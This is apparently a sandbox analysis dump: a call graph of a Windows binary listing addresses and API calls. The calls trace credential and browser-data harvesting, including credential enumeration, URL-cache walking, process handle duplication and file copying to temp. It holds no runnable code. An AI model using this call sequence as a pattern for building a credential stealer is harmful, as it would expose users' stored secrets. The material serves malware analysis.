memset memset 38987 414c2e 16 API calls 38973->38987 39412 409b98 GetFileAttributesW 38974->39412 38975 445823 38975->38945 38986 4087b3 338 API calls 38975->38986 38988 4459bc 38976->38988 38989 409d1f 6 API calls 38977->38989 38979 445879 38979->38954 39000 4087b3 338 API calls 38979->39000 38981->38930 39005 44594a 38981->39005 39361 409d1f wcslen wcslen 38982->39361 38993 40b2cc 27 API calls 38984->38993 38986->38975 38997 445dde 38987->38997 39479 409b98 GetFileAttributesW 38988->39479 38999 445ce1 38989->38999 38990 445bb3 39486 445403 memset 38990->39486 38991 445680 38991->38967 39232 4087b3 memset 38991->39232 38994 445bf3 38993->38994 39003 409d1f 6 API calls 38994->39003 38995 445928 38995->39005 39413 40b6ef 38995->39413 39006 40b2cc 27 API calls 38997->39006 39503 409b98 GetFileAttributesW 38999->39503 39000->38979 39014 445c07 39003->39014 39015 445d54 _wcsicmp 39004->39015 39005->38934 39019 4459ed 39005->39019 39018 445def 39006->39018 39007 4459cb 39007->39019 39028 40b6ef 252 API calls 39007->39028 39011 40b2cc 27 API calls 39012 445a94 39011->39012 39366 40ae18 39012->39366 39013 44566d 39013->38928 39283 413d4c 39013->39283 39024 445389 258 API calls 39014->39024 39025 445d71 39015->39025 39090 445d67 39015->39090 39017 445665 39397 40b1ab ??3@YAXPAX ??3@YAXPAX 39017->39397 39026 409d1f 6 API calls 39018->39026 39019->38939 39019->38940 39020->38971 39020->38972 39020->38973 39021 445389 258 API calls 39021->38946 39030 445c17 39024->39030 39504 445093 23 API calls 39025->39504 39033 445e03 39026->39033 39028->39019 39029 4456d8 39035 40b2cc 27 API calls 39029->39035 39036 40b2cc 27 API calls 39030->39036 39032 44563c 39032->39017 39038 4087b3 338 API calls 39032->39038 39505 409b98 GetFileAttributesW 39033->39505 39034 40b6ef 252 API calls 39034->38971 39040 4456e2 39035->39040 39041 445c23 39036->39041 39037 445d83 39037->38971 39038->39032 39399 413fa6 _wcsicmp _wcsicmp 39040->39399 39045 409d1f 6 API calls 39041->39045 39043 445e12 39050 445e6b 39043->39050 39056 40b2cc 27 API calls 39043->39056 39048 445c37 39045->39048 39046 445aa1 39049 445b17 39046->39049 39064 445ab2 memset 39046->39064 39077 409d1f 6 API calls 39046->39077 39373 40add4 39046->39373 39378 445389 39046->39378 39387 40ae51 39046->39387 39047 4456eb 39052 4456fd memset memset memset memset 39047->39052 39053 4457ea 39047->39053 39054 445389 258 API calls 39048->39054 39480 40aebe 39049->39480 39507 445093 23 API calls 39050->39507 39400 409c70 wcscpy wcsrchr 39052->39400 39403 413d29 39053->39403 39059 445c47 39054->39059 39060 445e33 39056->39060 39066 40b2cc 27 API calls 39059->39066 39067 409d1f 6 API calls 39060->39067 39062 445e7e 39063 445f67 39062->39063 39072 40b2cc 27 API calls 39063->39072 39068 40b2cc 27 API calls 39064->39068 39070 445c53 39066->39070 39071 445e47 39067->39071 39068->39046 39069 409c70 2 API calls 39073 44577e 39069->39073 39074 409d1f 6 API calls 39070->39074 39506 409b98 GetFileAttributesW 39071->39506 39076 445f73 39072->39076 39078 409c70 2 API calls 39073->39078 39079 445c67 39074->39079 39081 409d1f 6 API calls 39076->39081 39077->39046 39082 44578d 39078->39082 39083 445389 258 API calls 39079->39083 39080 445e56 39080->39050 39086 445e83 memset 39080->39086 39084 445f87 39081->39084 39082->39053 39089 40b2cc 27 API calls 39082->39089 39083->38946 39510 409b98 GetFileAttributesW 39084->39510 39088 40b2cc 27 API calls 39086->39088 39091 445eab 39088->39091 39092 4457a8 39089->39092 39090->38971 39090->39034 39093 409d1f 6 API calls 39091->39093 39094 409d1f 6 API calls 39092->39094 39095 445ebf 39093->39095 39096 4457b8 39094->39096 39097 40ae18 9 API calls 39095->39097 39402 409b98 GetFileAttributesW 39096->39402 39107 445ef5 39097->39107 39099 4457c7 39099->39053 39101 4087b3 338 API calls 39099->39101 39100 40ae51 9 API calls 39100->39107 39101->39053 39102 445f5c 39104 40aebe FindClose 39102->39104 39103 40add4 2 API calls 39103->39107 39104->39063 39105 40b2cc 27 API calls 39105->39107 39106 409d1f 6 API calls 39106->39107 39107->39100 39107->39102 39107->39103 39107->39105 39107->39106 39109 445f3a 39107->39109 39508 409b98 GetFileAttributesW 39107->39508 39509 445093 23 API calls 39109->39509 39111->38910 39112->38912 39113->38910 39114->38905 39116 40c775 39115->39116 39511 40b1ab ??3@YAXPAX ??3@YAXPAX 39116->39511 39118 40c788 39512 40b1ab ??3@YAXPAX ??3@YAXPAX 39118->39512 39120 40c790 39513 40b1ab ??3@YAXPAX ??3@YAXPAX 39120->39513 39122 40c798 39123 40aa04 ??3@YAXPAX 39122->39123 39124 40c7a0 39123->39124 39514 40c274 memset 39124->39514 39129 40a8ab 9 API calls 39130 40c7c3 39129->39130 39131 40a8ab 9 API calls 39130->39131 39132 40c7d0 39131->39132 39543 40c3c3 39132->39543 39136 40c877 39145 40bdb0 39136->39145 39137 40c86c 39585 4053fe 39 API calls 39137->39585 39139 40c7e5 39139->39136 39139->39137 39144 40c634 49 API calls 39139->39144 39568 40a706 39139->39568 39144->39139 39756 404363 39145->39756 39148 40bf5d 39776 40440c 39148->39776 39150 40bdee 39150->39148 39153 40b2cc 27 API calls 39150->39153 39151 40bddf CredEnumerateW 39151->39150 39154 40be02 wcslen 39153->39154 39154->39148 39157 40be1e 39154->39157 39155 40be26 _wcsncoll 39155->39157 39157->39148 39157->39155 39159 40be7d memset 39157->39159 39160 40bea7 memcpy 39157->39160 39161 40bf11 wcschr 39157->39161 39162 40b2cc 27 API calls 39157->39162 39164 40bf43 LocalFree 39157->39164 39779 40bd5d 28 API calls 39157->39779 39780 404423 39157->39780 39159->39157 39159->39160 39160->39157 39160->39161 39161->39157 39163 40bef6 _wcsnicmp 39162->39163 39163->39157 39163->39161 39164->39157 39165 4135f7 39793 4135e0 39165->39793 39168 40b2cc 27 API calls 39169 41360d 39168->39169 39199 40399d 39198->39199 39822 403a16 39199->39822 39201 403a09 39836 40b1ab ??3@YAXPAX ??3@YAXPAX 39201->39836 39203 403a12 wcsrchr 39203->38935 39204 4039a3 39204->39201 39207 4039f4 39204->39207 39833 40a02c CreateFileW 39204->39833 39207->39201 39208 4099c6 2 API calls 39207->39208 39208->39201 39210 414c2e 16 API calls 39209->39210 39211 404048 39210->39211 39212 414c2e 16 API calls 39211->39212 39213 404056 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 404073 39214->39215 39216 409d1f 6 API calls 39215->39216 39217 40408e 39216->39217 39218 409d1f 6 API calls 39217->39218 39219 4040a6 39218->39219 39220 403af5 20 API calls 39219->39220 39221 4040ba 39220->39221 39222 403af5 20 API calls 39221->39222 39223 4040cb 39222->39223 39863 40414f memset 39223->39863 39225 404140 39877 40b1ab ??3@YAXPAX ??3@YAXPAX 39225->39877 39227 4040ec memset 39230 4040e0 39227->39230 39228 404148 39228->38991 39229 4099c6 2 API calls 39229->39230 39230->39225 39230->39227 39230->39229 39231 40a8ab 9 API calls 39230->39231 39231->39230 39890 40a6e6 WideCharToMultiByte 39232->39890 39234 4087ed 39891 4095d9 memset 39234->39891 39284 40b633 ??3@YAXPAX 39283->39284 39285 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39284->39285 39286 413f00 Process32NextW 39285->39286 39287 413da5 OpenProcess 39286->39287 39288 413f17 FindCloseChangeNotification 39286->39288 39289 413df3 memset 39287->39289 39292 413eb0 39287->39292 39288->39029 40126 413f27 39289->40126 39291 413ebf ??3@YAXPAX 39291->39292 39292->39286 39292->39291 39293 4099f4 3 API calls 39292->39293 39293->39292 39295 413e37 GetModuleHandleW 39296 413e1f 39295->39296 39297 413e46 GetProcAddress 39295->39297 39296->39295 40131 413959 39296->40131 40147 413ca4 39296->40147 39297->39296 39299 413ea2 CloseHandle 39299->39292 39301 414c2e 16 API calls 39300->39301 39302 403eb7 39301->39302 39303 414c2e 16 API calls 39302->39303 39304 403ec5 39303->39304 39305 409d1f 6 API calls 39304->39305 39306 403ee2 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 403efd 39307->39308 39309 409d1f 6 API calls 39308->39309 39310 403f15 39309->39310 39311 403af5 20 API calls 39310->39311 39312 403f29 39311->39312 39313 403af5 20 API calls 39312->39313 39314 403f3a 39313->39314 39315 40414f 33 API calls 39314->39315 39316 403f4f 39315->39316 39317 403faf 39316->39317 39319 403f5b memset 39316->39319 39321 4099c6 2 API calls 39316->39321 39322 40a8ab 9 API calls 39316->39322 40161 40b1ab ??3@YAXPAX ??3@YAXPAX 39317->40161 39319->39316 39320 403fb7 39320->38975 39321->39316 39322->39316 39324 414c2e 16 API calls 39323->39324 39325 403d26 39324->39325 39326 414c2e 16 API calls 39325->39326 39327 403d34 39326->39327 39328 409d1f 6 API calls 39327->39328 39329 403d51 39328->39329 39330 409d1f 6 API calls 39329->39330 39331 403d6c 39330->39331 39332 409d1f 6 API calls 39331->39332 39333 403d84 39332->39333 39334 403af5 20 API calls 39333->39334 39335 403d98 39334->39335 39336 403af5 20 API calls 39335->39336 39337 403da9 39336->39337 39338 40414f 33 API calls 39337->39338 39339 403dbe 39338->39339 39340 403e1e 39339->39340 39341 403dca memset 39339->39341 39344 4099c6 2 API calls 39339->39344 39345 40a8ab 9 API calls 39339->39345 40162 40b1ab ??3@YAXPAX ??3@YAXPAX 39340->40162 39341->39339 39343 403e26 39343->38979 39344->39339 39345->39339 39347 414b81 9 API calls 39346->39347 39348 414c40 39347->39348 39349 414c73 memset 39348->39349 40163 409cea 39348->40163 39350 414c94 39349->39350 40166 414592 RegOpenKeyExW 39350->40166 39353 414c64 39353->38969 39355 414cc1 39356 414cf4 wcscpy 39355->39356 40167 414bb0 wcscpy 39355->40167 39356->39353 39358 414cd2 40168 4145ac RegQueryValueExW 39358->40168 39360 414ce9 RegCloseKey 39360->39356 39362 409d62 39361->39362 39363 409d43 wcscpy 39361->39363 39362->39011 39364 409719 2 API calls 39363->39364 39365 409d51 wcscat 39364->39365 39365->39362 39367 40aebe FindClose 39366->39367 39368 40ae21 39367->39368 39369 4099c6 2 API calls 39368->39369 39370 40ae35 39369->39370 39371 409d1f 6 API calls 39370->39371 39372 40ae49 39371->39372 39372->39046 39374 40ade0 39373->39374 39375 40ae0f 39373->39375 39374->39375 39376 40ade7 wcscmp 39374->39376 39375->39046 39376->39375 39377 40adfe wcscmp 39376->39377 39377->39375 39379 40ae18 9 API calls 39378->39379 39385 4453c4 39379->39385 39380 40ae51 9 API calls 39380->39385 39381 4453f3 39383 40aebe FindClose 39381->39383 39382 40add4 2 API calls 39382->39385 39384 4453fe 39383->39384 39384->39046 39385->39380 39385->39381 39385->39382 39386 445403 253 API calls 39385->39386 39386->39385 39388 40ae7b FindNextFileW 39387->39388 39389 40ae5c FindFirstFileW 39387->39389 39390 40ae94 39388->39390 39391 40ae8f 39388->39391 39389->39390 39393 40aeb6 39390->39393 39394 409d1f 6 API calls 39390->39394 39392 40aebe FindClose 39391->39392 39392->39390 39393->39046 39394->39393 39396->39032 39397->39013 39398->39013 39399->39047 39401 409c89 39400->39401 39401->39069 39402->39099 39404 413d39 39403->39404 39405 413d2f FreeLibrary 39403->39405 39406 40b633 ??3@YAXPAX 39404->39406 39405->39404 39407 413d42 39406->39407 39408 40b633 ??3@YAXPAX 39407->39408 39409 413d4a 39408->39409 39409->38928 39410->38932 39411->38981 39412->38995 39414 44db70 39413->39414 39415 40b6fc memset 39414->39415 39416 409c70 2 API calls 39415->39416 39417 40b732 wcsrchr 39416->39417 39418 40b743 39417->39418 39419 40b746 memset 39417->39419 39418->39419 39420 40b2cc 27 API calls 39419->39420 39421 40b76f 39420->39421 39422 409d1f 6 API calls 39421->39422 39423 40b783 39422->39423 40169 409b98 GetFileAttributesW 39423->40169 39425 40b792 39426 40b7c2 39425->39426 39427 409c70 2 API calls 39425->39427 40170 40bb98 39426->40170 39429 40b7a5 39427->39429 39431 40b2cc 27 API calls 39429->39431 39435 40b7b2 39431->39435 39432 40b837 FindCloseChangeNotification 39434 40b83e memset 39432->39434 39433 40b817 40204 409a45 GetTempPathW 39433->40204 40203 40a6e6 WideCharToMultiByte 39434->40203 39438 409d1f 6 API calls 39435->39438 39438->39426 39439 40b827 CopyFileW 39439->39434 39440 40b866 39441 444432 121 API calls 39440->39441 39442 40b879 39441->39442 39443 40bad5 39442->39443 39444 40b273 27 API calls 39442->39444 39445 40baeb 39443->39445 39446 40bade DeleteFileW 39443->39446 39447 40b89a 39444->39447 39448 40b04b ??3@YAXPAX 39445->39448 39446->39445 39449 438552 134 API calls 39447->39449 39450 40baf3 39448->39450 39451 40b8a4 39449->39451 39450->39005 39452 40bacd 39451->39452 39454 4251c4 137 API calls 39451->39454 39453 443d90 111 API calls 39452->39453 39453->39443 39477 40b8b8 39454->39477 39455 40bac6 40216 424f26 123 API calls 39455->40216 39456 40b8bd memset 40207 425413 17 API calls 39456->40207 39459 425413 17 API calls 39459->39477 39462 40a71b MultiByteToWideChar 39462->39477 39463 40a734 MultiByteToWideChar 39463->39477 39466 40b9b5 memcmp 39466->39477 39467 4099c6 2 API calls 39467->39477 39468 404423 37 API calls 39468->39477 39470 40bb3e memset memcpy 40217 40a734 MultiByteToWideChar 39470->40217 39471 4251c4 137 API calls 39471->39477 39474 40bb88 LocalFree 39474->39477 39477->39455 39477->39456 39477->39459 39477->39462 39477->39463 39477->39466 39477->39467 39477->39468 39477->39470 39477->39471 39478 40ba5f memcmp 39477->39478 40208 4253ef 16 API calls 39477->40208 40209 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39477->40209 40210 4253af 17 API calls 39477->40210 40211 4253cf 17 API calls 39477->40211 40212 447280 memset 39477->40212 40213 447960 memset memcpy memcpy memcpy 39477->40213 40214 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39477->40214 40215 447920 memcpy memcpy memcpy 39477->40215 39478->39477 39479->39007 39481 40aed1 39480->39481 39482 40aec7 FindClose 39480->39482 39481->38940 39482->39481 39484 4099d7 39483->39484 39485 4099da memcpy 39483->39485 39484->39485 39485->38990 39487 40b2cc 27 API calls 39486->39487 39488 44543f 39487->39488 39489 409d1f 6 API calls 39488->39489 39490 44544f 39489->39490 40306 409b98 GetFileAttributesW 39490->40306 39492 44545e 39493 445476 39492->39493 39494 40b6ef 252 API calls 39492->39494 39495 40b2cc 27 API calls 39493->39495 39494->39493 39496 445482 39495->39496 39497 409d1f 6 API calls 39496->39497 39498 445492 39497->39498 40307 409b98 GetFileAttributesW 39498->40307 39500 4454a1 39501 4454b9 39500->39501 39502 40b6ef 252 API calls 39500->39502 39501->39021 39502->39501 39503->39020 39504->39037 39505->39043 39506->39080 39507->39062 39508->39107 39509->39107 39510->39090 39511->39118 39512->39120 39513->39122 39515 414c2e 16 API calls 39514->39515 39516 40c2ae 39515->39516 39586 40c1d3 39516->39586 39521 40c3be 39538 40a8ab 39521->39538 39522 40afcf 2 API calls 39523 40c2fd FindFirstUrlCacheEntryW 39522->39523 39524 40c3b6 39523->39524 39525 40c31e wcschr 39523->39525 39526 40b04b ??3@YAXPAX 39524->39526 39527 40c331 39525->39527 39528 40c35e FindNextUrlCacheEntryW 39525->39528 39526->39521 39529 40a8ab 9 API calls 39527->39529 39528->39525 39530 40c373 GetLastError 39528->39530 39533 40c33e wcschr 39529->39533 39531 40c3ad FindCloseUrlCache 39530->39531 39532 40c37e 39530->39532 39531->39524 39534 40afcf 2 API calls 39532->39534 39533->39528 39535 40c34f 39533->39535 39536 40c391 FindNextUrlCacheEntryW 39534->39536 39537 40a8ab 9 API calls 39535->39537 39536->39525 39536->39531 39537->39528 39680 40a97a 39538->39680 39541 40a8cc 39541->39129 39686 40b1ab ??3@YAXPAX ??3@YAXPAX 39543->39686 39545 40c3dd 39546 40b2cc 27 API calls 39545->39546 39547 40c3e7 39546->39547 39687 414592 RegOpenKeyExW 39547->39687 39549 40c3f4 39550 40c50e 39549->39550 39551 40c3ff 39549->39551 39565 405337 39550->39565 39552 40a9ce 4 API calls 39551->39552 39553 40c418 memset 39552->39553 39688 40aa1d 39553->39688 39556 40c471 39558 40c47a _wcsupr 39556->39558 39557 40c505 RegCloseKey 39557->39550 39690 40a8d0 7 API calls 39558->39690 39560 40c498 39691 40a8d0 7 API calls 39560->39691 39562 40c4ac memset 39563 40aa1d 39562->39563 39564 40c4e4 RegEnumValueW 39563->39564 39564->39557 39564->39558 39692 405220 39565->39692 39569 4099c6 2 API calls 39568->39569 39570 40a714 _wcslwr 39569->39570 39571 40c634 39570->39571 39749 405361 39571->39749 39574 40c65c wcslen 39752 4053b6 39 API calls 39574->39752 39575 40c71d wcslen 39575->39139 39577 40c713 39755 4053df 39 API calls 39577->39755 39578 40c677 39578->39577 39753 40538b 39 API calls 39578->39753 39581 40c6a5 39581->39577 39582 40c6a9 memset 39581->39582 39583 40c6d3 39582->39583 39754 40c589 43 API calls 39583->39754 39585->39136 39587 40ae18 9 API calls 39586->39587 39593 40c210 39587->39593 39588 40ae51 9 API calls 39588->39593 39589 40c264 39590 40aebe FindClose 39589->39590 39592 40c26f 39590->39592 39591 40add4 2 API calls 39591->39593 39598 40e5ed memset memset 39592->39598 39593->39588 39593->39589 39593->39591 39594 40c231 _wcsicmp 39593->39594 39595 40c1d3 35 API calls 39593->39595 39594->39593 39596 40c248 39594->39596 39595->39593 39611 40c084 22 API calls 39596->39611 39599 414c2e 16 API calls 39598->39599 39600 40e63f 39599->39600 39601 409d1f 6 API calls 39600->39601 39602 40e658 39601->39602 39612 409b98 GetFileAttributesW 39602->39612 39604 40e667 39605 40e680 39604->39605 39607 409d1f 6 API calls 39604->39607 39613 409b98 GetFileAttributesW 39605->39613 39607->39605 39608 40e68f 39609 40c2d8 39608->39609 39614 40e4b2 39608->39614 39609->39521 39609->39522 39611->39593 39612->39604 39613->39608 39635 40e01e 39614->39635 39616 40e593 39618 40e5b0 39616->39618 39619 40e59c DeleteFileW 39616->39619 39617 40e521 39617->39616 39658 40e175 39617->39658 39620 40b04b ??3@YAXPAX 39618->39620 39619->39618 39621 40e5bb 39620->39621 39623 40e5c4 CloseHandle 39621->39623 39624 40e5cc 39621->39624 39623->39624 39626 40b633 ??3@YAXPAX 39624->39626 39625 40e573 39627 40e584 39625->39627 39628 40e57c FindCloseChangeNotification 39625->39628 39629 40e5db 39626->39629 39679 40b1ab ??3@YAXPAX ??3@YAXPAX 39627->39679 39628->39627 39632 40b633 ??3@YAXPAX 39629->39632 39631 40e540 39631->39625 39678 40e2ab 30 API calls 39631->39678 39633 40e5e3 39632->39633 39633->39609 39636 406214 22 API calls 39635->39636 39637 40e03c 39636->39637 39638 40e16b 39637->39638 39639 40dd85 74 API calls 39637->39639 39638->39617 39640 40e06b 39639->39640 39640->39638 39641 40afcf ??2@YAPAXI ??3@YAXPAX 39640->39641 39642 40e08d OpenProcess 39641->39642 39643 40e0a4 GetCurrentProcess DuplicateHandle 39642->39643 39647 40e152 39642->39647 39644 40e0d0 GetFileSize 39643->39644 39645 40e14a CloseHandle 39643->39645 39648 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39644->39648 39645->39647 39646 40e160 39650 40b04b ??3@YAXPAX 39646->39650 39647->39646 39649 406214 22 API calls 39647->39649 39651 40e0ea 39648->39651 39649->39646 39650->39638 39652 4096dc CreateFileW 39651->39652 39653 40e0f1 CreateFileMappingW 39652->39653 39654 40e140 CloseHandle CloseHandle 39653->39654 39655 40e10b MapViewOfFile 39653->39655 39654->39645 39656 40e13b FindCloseChangeNotification 39655->39656 39657 40e11f WriteFile UnmapViewOfFile 39655->39657 39656->39654 39657->39656 39659 40e18c 39658->39659 39660 406b90 11 API calls 39659->39660 39661 40e19f 39660->39661 39662 40e1a7 memset 39661->39662 39663 40e299 39661->39663 39668 40e1e8 39662->39668 39664 4069a3 ??3@YAXPAX ??3@YAXPAX 39663->39664 39665 40e2a4 39664->39665 39665->39631 39666 406e8f 13 API calls 39666->39668 39667 406b53 SetFilePointerEx ReadFile 39667->39668 39668->39666 39668->39667 39669 40e283 39668->39669 39670 40dd50 _wcsicmp 39668->39670 39674 40742e 8 API calls 39668->39674 39675 40aae3 wcslen wcslen _memicmp 39668->39675 39676 40e244 _snwprintf 39668->39676 39671 40e291 39669->39671 39672 40e288 ??3@YAXPAX 39669->39672 39670->39668 39673 40aa04 ??3@YAXPAX 39671->39673 39672->39671 39673->39663 39674->39668 39675->39668 39677 40a8d0 7 API calls 39676->39677 39677->39668 39678->39631 39679->39616 39682 40a980 39680->39682 39681 40a8bb 39681->39541 39685 40a8d0 7 API calls 39681->39685 39682->39681 39683 40a995 _wcsicmp 39682->39683 39684 40a99c wcscmp 39682->39684 39683->39682 39684->39682 39685->39541 39686->39545 39687->39549 39689 40aa23 RegEnumValueW 39688->39689 39689->39556 39689->39557 39690->39560 39691->39562 39693 405335 39692->39693 39694 40522a 39692->39694 39693->39139 39695 40b2cc 27 API calls 39694->39695 39696 405234 39695->39696 39697 40a804 8 API calls 39696->39697 39698 40523a 39697->39698 39737 40b273 39698->39737 39700 405248 _mbscpy _mbscat GetProcAddress 39701 40b273 27 API calls 39700->39701 39702 405279 39701->39702 39740 405211 GetProcAddress 39702->39740 39704 405282 39705 40b273 27 API calls 39704->39705 39706 40528f 39705->39706 39741 405211 GetProcAddress 39706->39741 39708 405298 39738 40b58d 27 API calls 39737->39738 39739 40b18c 39738->39739 39739->39700 39740->39704 39741->39708 39750 405220 39 API calls 39749->39750 39751 405369 39750->39751 39751->39574 39751->39575 39752->39578 39753->39581 39754->39577 39755->39575 39757 40440c FreeLibrary 39756->39757 39758 40436d 39757->39758 39759 40a804 8 API calls 39758->39759 39760 404377 39759->39760 39761 404383 39760->39761 39762 404405 39760->39762 39763 40b273 27 API calls 39761->39763 39762->39148 39762->39150 39762->39151 39764 40438d GetProcAddress 39763->39764 39765 40b273 27 API calls 39764->39765 39766 4043a7 GetProcAddress 39765->39766 39767 40b273 27 API calls 39766->39767 39768 4043ba GetProcAddress 39767->39768 39769 40b273 27 API calls 39768->39769 39777 404413 FreeLibrary 39776->39777 39778 40441e 39776->39778 39777->39778 39778->39165 39779->39157 39781 40442e 39780->39781 39782 40447e 39780->39782 39783 40b2cc 27 API calls 39781->39783 39782->39157 39784 404438 39783->39784 39794 4135f6 39793->39794 39795 4135eb FreeLibrary 39793->39795 39794->39168 39795->39794 39823 403a29 39822->39823 39837 403bed memset memset 39823->39837 39825 403ae7 39850 40b1ab ??3@YAXPAX ??3@YAXPAX 39825->39850 39826 403a3f memset 39832 403a2f 39826->39832 39828 403aef 39828->39204 39829 409b98 GetFileAttributesW 39829->39832 39830 40a8d0 7 API calls 39830->39832 39831 409d1f 6 API calls 39831->39832 39832->39825 39832->39826 39832->39829 39832->39830 39832->39831 39834 40a051 GetFileTime FindCloseChangeNotification 39833->39834 39835 4039ca CompareFileTime 39833->39835 39834->39835 39835->39204 39836->39203 39838 414c2e 16 API calls 39837->39838 39839 403c38 39838->39839 39840 409719 2 API calls 39839->39840 39841 403c3f wcscat 39840->39841 39842 414c2e 16 API calls 39841->39842 39843 403c61 39842->39843 39844 409719 2 API calls 39843->39844 39845 403c68 wcscat 39844->39845 39851 403af5 39845->39851 39848 403af5 20 API calls 39849 403c95 39848->39849 39849->39832 39850->39828 39852 403b02 39851->39852 39853 40ae18 9 API calls 39852->39853 39861 403b37 39853->39861 39854 403bdb 39856 40aebe FindClose 39854->39856 39855 40add4 wcscmp wcscmp 39855->39861 39857 403be6 39856->39857 39857->39848 39858 40ae18 9 API calls 39858->39861 39859 40ae51 9 API calls 39859->39861 39860 40aebe FindClose 39860->39861 39861->39854 39861->39855 39861->39858 39861->39859 39861->39860 39862 40a8d0 7 API calls 39861->39862 39862->39861 39864 409d1f 6 API calls 39863->39864 39865 404190 39864->39865 39878 409b98 GetFileAttributesW 39865->39878 39867 40419c 39868 4041a7 6 API calls 39867->39868 39869 40435c 39867->39869 39871 40424f 39868->39871 39869->39230 39871->39869 39872 40425e memset 39871->39872 39874 409d1f 6 API calls 39871->39874 39875 40a8ab 9 API calls 39871->39875 39879 414842 39871->39879 39872->39871 39873 404296 wcscpy 39872->39873 39873->39871 39874->39871 39876 4042b6 memset memset _snwprintf wcscpy 39875->39876 39876->39871 39877->39228 39878->39867 39882 41443e 39879->39882 39881 414866 39881->39871 39883 41444b 39882->39883 39884 414451 39883->39884 39885 4144a3 GetPrivateProfileStringW 39883->39885 39886 414491 39884->39886 39887 414455 wcschr 39884->39887 39885->39881 39888 414495 WritePrivateProfileStringW 39886->39888 39887->39886 39889 414463 _snwprintf 39887->39889 39888->39881 39889->39888 39890->39234 39892 40b2cc 27 API calls 39891->39892 39893 409615 39892->39893 39894 409d1f 6 API calls 39893->39894 39895 409625 39894->39895 40153 413f4f 40126->40153 40129 413f37 K32GetModuleFileNameExW 40130 413f4a 40129->40130 40130->39296 40132 413969 wcscpy 40131->40132 40133 41396c wcschr 40131->40133 40145 413a3a 40132->40145 40133->40132 40135 41398e 40133->40135 40158 4097f7 wcslen wcslen _memicmp 40135->40158 40137 41399a 40138 4139a4 memset 40137->40138 40139 4139e6 40137->40139 40159 409dd5 GetWindowsDirectoryW wcscpy 40138->40159 40141 413a31 wcscpy 40139->40141 40142 4139ec memset 40139->40142 40141->40145 40160 409dd5 GetWindowsDirectoryW wcscpy 40142->40160 40143 4139c9 wcscpy wcscat 40143->40145 40145->39296 40146 413a11 memcpy wcscat 40146->40145 40148 413cb0 GetModuleHandleW 40147->40148 40149 413cda 40147->40149 40148->40149 40150 413cbf GetProcAddress 40148->40150 40151 413ce3 GetProcessTimes 40149->40151 40152 413cf6 40149->40152 40150->40149 40151->39299 40152->39299 40154 413f2f 40153->40154 40155 413f54 40153->40155 40154->40129 40154->40130 40156 40a804 8 API calls 40155->40156 40157 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40156->40157 40157->40154 40158->40137 40159->40143 40160->40146 40161->39320 40162->39343 40164 409cf9 GetVersionExW 40163->40164 40165 409d0a 40163->40165 40164->40165 40165->39349 40165->39353 40166->39355 40167->39358 40168->39360 40169->39425 40171 40bba5 40170->40171 40218 40cc26 40171->40218 40174 40bd4b 40239 40cc0c 40174->40239 40179 40b2cc 27 API calls 40180 40bbef 40179->40180 40246 40ccf0 _wcsicmp 40180->40246 40182 40bbf5 40182->40174 40247 40ccb4 6 API calls 40182->40247 40184 40bc26 40185 40cf04 17 API calls 40184->40185 40186 40bc2e 40185->40186 40187 40bd43 40186->40187 40188 40b2cc 27 API calls 40186->40188 40189 40cc0c 4 API calls 40187->40189 40190 40bc40 40188->40190 40189->40174 40248 40ccf0 _wcsicmp 40190->40248 40192 40bc46 40192->40187 40193 40bc61 memset memset WideCharToMultiByte 40192->40193 40249 40103c strlen 40193->40249 40195 40bcc0 40196 40b273 27 API calls 40195->40196 40197 40bcd0 memcmp 40196->40197 40197->40187 40198 40bce2 40197->40198 40199 404423 37 API calls 40198->40199 40200 40bd10 40199->40200 40200->40187 40201 40bd3a LocalFree 40200->40201 40202 40bd1f memcpy 40200->40202 40201->40187 40202->40201 40203->39440 40205 409a74 GetTempFileNameW 40204->40205 40206 409a66 GetWindowsDirectoryW 40204->40206 40205->39439 40206->40205 40207->39477 40208->39477 40209->39477 40210->39477 40211->39477 40212->39477 40213->39477 40214->39477 40215->39477 40216->39452 40217->39474 40250 4096c3 CreateFileW 40218->40250 40220 40cc34 40221 40cc3d GetFileSize 40220->40221 40229 40bbca 40220->40229 40222 40afcf 2 API calls 40221->40222 40223 40cc64 40222->40223 40251 40a2ef ReadFile 40223->40251 40225 40cc71 40252 40ab4a MultiByteToWideChar 40225->40252 40227 40cc95 FindCloseChangeNotification 40228 40b04b ??3@YAXPAX 40227->40228 40228->40229 40229->40174 40230 40cf04 40229->40230 40231 40b633 ??3@YAXPAX 40230->40231 40232 40cf14 40231->40232 40258 40b1ab ??3@YAXPAX ??3@YAXPAX 40232->40258 40234 40bbdd 40234->40174 40234->40179 40235 40cf1b 40235->40234 40237 40cfef 40235->40237 40259 40cd4b 40235->40259 40238 40cd4b 14 API calls 40237->40238 40238->40234 40240 40b633 ??3@YAXPAX 40239->40240 40241 40cc15 40240->40241 40242 40aa04 ??3@YAXPAX 40241->40242 40243 40cc1d 40242->40243 40305 40b1ab ??3@YAXPAX ??3@YAXPAX 40243->40305 40245 40b7d4 memset CreateFileW 40245->39432 40245->39433 40246->40182 40247->40184 40248->40192 40249->40195 40250->40220 40251->40225 40253 40ab93 40252->40253 40254 40ab6b 40252->40254 40253->40227 40255 40a9ce 4 API calls 40254->40255 40256 40ab74 40255->40256 40257 40ab7c MultiByteToWideChar 40256->40257 40257->40253 40258->40235 40260 40cd7b 40259->40260 40293 40aa29 6 API calls 40260->40293 40262 40cef5 40263 40aa04 ??3@YAXPAX 40262->40263 40264 40cefd 40263->40264 40264->40235 40265 40cd89 40265->40262 40294 40aa29 6 API calls 40265->40294 40267 40ce1d 40295 40aa29 6 API calls 40267->40295 40269 40ce3e 40270 40ce6a 40269->40270 40296 40abb7 wcslen memmove 40269->40296 40271 40ce9f 40270->40271 40299 40abb7 wcslen memmove 40270->40299 40302 40a8d0 7 API calls 40271->40302 40274 40ce56 40297 40aa71 wcslen 40274->40297 40276 40ceb5 40303 40a8d0 7 API calls 40276->40303 40278 40ce8b 40300 40aa71 wcslen 40278->40300 40280 40ce5e 40298 40abb7 wcslen memmove 40280->40298 40281 40ce93 40301 40abb7 wcslen memmove 40281->40301 40285 40cecb 40304 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40285->40304 40287 40cedd 40288 40aa04 ??3@YAXPAX 40287->40288 40289 40cee5 40288->40289 40290 40aa04 ??3@YAXPAX 40289->40290 40291 40ceed 